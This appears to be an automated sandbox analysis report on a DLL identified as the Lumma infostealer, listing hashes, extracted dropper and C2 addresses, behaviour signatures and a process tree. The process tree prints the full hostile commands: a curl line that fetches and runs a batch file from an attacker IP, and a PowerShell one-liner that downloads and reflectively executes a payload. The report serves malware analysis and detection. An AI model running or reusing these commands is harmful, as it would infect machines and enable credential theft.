Analysis

  • max time kernel: 94s
  • max time network: 142s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 21/01/2025, 18:41

General

  • Target: b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
  • Size: 80KB
  • MD5: 07fd51e1e8368144ea403137a671b84c
  • SHA1: b41a78c43c5bf58f6664cb455130c9501c370f05
  • SHA256: b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f
  • SHA512: 854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7
  • SSDEEP: 1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs:
    • ps1.dropper: http://147.45.44.131/infopage/ioubcs.exe
    • exe.dropper: http://147.45.44.131/infopage/ioubcs.exe

Extracted

  • Family: lumma
  • C2: https://factlosserk.click/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Windows\SysWOW64\curl.exe
          curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
          4⤵
            PID:5032
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K AppS.bat
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2936
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4104
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4696
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp" "c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2392
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4976

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp
    Filesize: 1KB
    MD5: 016b6fcfecdb1b5ed2c1ccf2c391a814
    SHA1: f4f99950557e15f0de8dfa8d2f98df994788d41c
    SHA256: 5b1d9a912ec8fabaf79700681567a3505f3e5cb641ba0f5b41179ef43e44a516
    SHA512: c01cd78d0f1d9567b82d5f50445d6b67dd16540e6d2a7de9c180ad3fcaabdf86e109c78cb12adc36b7f3395bdaa96cc3273b7b56ad66bff0ea12398cb0db762d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n45yynra.xie.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.dll
    Filesize: 9KB
    MD5: af563fda59513de1cf9bd54c842930f5
    SHA1: bb0ccf2bfa7f3a6388e6e6105528a34a8d1b1fef
    SHA256: 34b6ad6b7dff40171dea8e08bfebcbfeeb809a063c0b51f296c39942dfea05f9
    SHA512: b2435a49e49ebfd9be6212163345668181776e123850000612f27cca84c22dc35a6bd29c1402631145e3e0f7214cbf86215da9a66a0e0e2cef9654ae4a52eb6b

  • C:\Windows\Temp\AppS.bat
    Filesize: 5KB
    MD5: 244582a493f376d9c0f5672292d11ff2
    SHA1: 95e5011b114869175aebca27f73b11a9b0a2360b
    SHA256: ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87
    SHA512: 59e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41

  • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP
    Filesize: 652B
    MD5: e68fd1932e84a119b2875f57b5403f16
    SHA1: a360ec1208a49b7d722b3b9d98a2dbf8ca9bea3b
    SHA256: 1baf0c41e97d6e57b3feac57efac872099c6fd1c2098eeaa0457ddc7df18d1da
    SHA512: fe7f730c3dfda414a2525489c8c01bc5e4da2cf4310904dfd4090f1105ed4bf6d0cd170b721a4d56b951bbadd63de9b0f721e539897421f514a9acfa85868f2e

  • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.0.cs
    Filesize: 10KB
    MD5: 9a280bef5048674eed1b619db8e0c654
    SHA1: f849de0496358992d1c0d40562da1aaede680453
    SHA256: 84a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30
    SHA512: 6a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f

  • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline
    Filesize: 204B
    MD5: 5d29a30a35c631cf07f7c4b210c6792b
    SHA1: ebe0a3146c53df90a74f45bb865909083f38ad54
    SHA256: 40d19c7663f72a5c5908aff2d8e5e4abc641eb8041c7717ddd9d30be5126f89c
    SHA512: db82782b7d2a160a38e4e8bea2f30e211b42ca525841ff395f215221ad3955c6120e09e1a2fca7522db6f587ae1e2110ba710cf610a2de5234da32f777bcf799

  • memory/4104-7-0x00000000058D0000-0x00000000058F2000-memory.dmp (Filesize: 136KB)
  • memory/4104-6-0x0000000074F50000-0x0000000075700000-memory.dmp (Filesize: 7.7MB)
  • memory/4104-8-0x0000000006050000-0x00000000060B6000-memory.dmp (Filesize: 408KB)
  • memory/4104-19-0x0000000006140000-0x0000000006494000-memory.dmp (Filesize: 3.3MB)
  • memory/4104-20-0x0000000006790000-0x00000000067AE000-memory.dmp (Filesize: 120KB)
  • memory/4104-21-0x00000000067D0000-0x000000000681C000-memory.dmp (Filesize: 304KB)
  • memory/4104-22-0x0000000007EC0000-0x000000000853A000-memory.dmp (Filesize: 6.5MB)
  • memory/4104-23-0x0000000006CD0000-0x0000000006CEA000-memory.dmp (Filesize: 104KB)
  • memory/4104-24-0x0000000006D70000-0x0000000006D7E000-memory.dmp (Filesize: 56KB)
  • memory/4104-9-0x00000000060C0000-0x0000000006126000-memory.dmp (Filesize: 408KB)
  • memory/4104-5-0x0000000005930000-0x0000000005F58000-memory.dmp (Filesize: 6.2MB)
  • memory/4104-4-0x0000000074F50000-0x0000000075700000-memory.dmp (Filesize: 7.7MB)
  • memory/4104-3-0x0000000003170000-0x00000000031A6000-memory.dmp (Filesize: 216KB)
  • memory/4104-2-0x0000000074F5E000-0x0000000074F5F000-memory.dmp (Filesize: 4KB)
  • memory/4104-37-0x0000000005450000-0x0000000005458000-memory.dmp (Filesize: 32KB)
  • memory/4104-43-0x0000000074F50000-0x0000000075700000-memory.dmp (Filesize: 7.7MB)
  • memory/4976-40-0x0000000000400000-0x000000000045A000-memory.dmp (Filesize: 360KB)
  • memory/4976-39-0x0000000000400000-0x000000000045A000-memory.dmp (Filesize: 360KB)